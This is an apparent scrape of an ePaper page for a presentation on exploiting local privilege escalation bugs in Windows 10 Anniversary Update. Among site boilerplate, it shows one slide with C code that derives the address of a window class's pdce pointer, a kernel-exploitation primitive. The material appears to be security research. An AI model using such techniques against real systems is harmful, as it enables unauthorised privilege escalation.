25.03.2017 Views

LPE vulnerabilities exploitation on Windows 10 Anniversary Update

Win10LPE

Win10LPE

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

Getting address of tagCLS.pdce<br />

We can get pdce pointer by using following code<br />

DWORD64 pWndUMAddr = GetUserObjectKAddr(hWnd) - dwClientDelta;<br />

DWORD64 pClassUMAddress = *(DWORD64 *)(pWndUMAddr + 0x98) - dwClientDelta;<br />

DWORD64 pDceAddress = *(DWORD64 *)(pClassUMAddress + 0x18);

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!